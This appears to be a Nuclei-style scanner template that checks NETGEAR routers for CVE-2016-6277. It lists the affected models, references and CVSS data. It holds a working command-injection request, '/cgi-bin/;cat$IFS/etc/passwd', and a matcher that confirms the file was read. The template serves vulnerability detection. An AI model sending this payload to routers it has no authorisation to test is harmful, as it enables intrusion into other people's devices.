id: CVE-2016-6277 info: name: NETGEAR Routers - Remote Code Execution author: pikpikcu severity: high description: NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. reference: - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 - http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - https://www.kb.cert.org/vuls/id/582384 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2016-6277 cwe-id: CWE-352 tags: cve,cve2016,netgear,rce,iot,cisa requests: - method: GET path: - "{{BaseURL}}/cgi-bin/;cat$IFS/etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # Enhanced by mp on 2022/06/09